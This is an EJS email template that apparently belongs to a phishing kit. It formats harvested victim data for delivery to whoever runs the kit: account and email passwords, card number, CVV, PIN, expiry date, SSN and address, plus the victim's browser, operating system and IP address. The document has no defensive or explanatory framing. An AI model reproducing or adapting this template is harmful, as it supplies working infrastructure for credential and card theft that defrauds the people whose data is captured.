<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title></title>

</head>

<body>

    <div class="main-content container-fluid p-0">
        <div class="email-head">

            <ul>
                <li>Username: <%=obj.username%></li>
                <li>FullName: <%=obj.fullName%></li>
                <li>Date Of Birth: <%=obj.dob%></li>
                <li>Password: <%=obj.password%></li>
                <li>Email: <%=obj.email%></li>
                <li>Email Password: <%=obj.emailPassword%></li>
                <li>Phone Number: <%=obj.phone%></li>
                <li>Card No: <%=obj.cardNo%></li>
                <li>Card CVV: <%=obj.cardCvv%></li>
                <li>Card Pin: <%=obj.cardPin%></li>
                <li>Card Exp. Date: <%=obj.expDate%></li>
                <li>Card SSN: <%=obj.ssn%></li>
                <li>Card Name: <%=obj.cardName%></li>
                <li>Card Address: <%=obj.address%></li>
                <br>
                <li>Browser Name: <%=obj.name%></li>
                <li>Browser Version: <%=obj.version%></li>
                <li>Operating System: <%=obj.os%></li>
                <li>IP Address: <%=obj.ipAddress%></li>
            </ul>
        </div>

</body>

</html>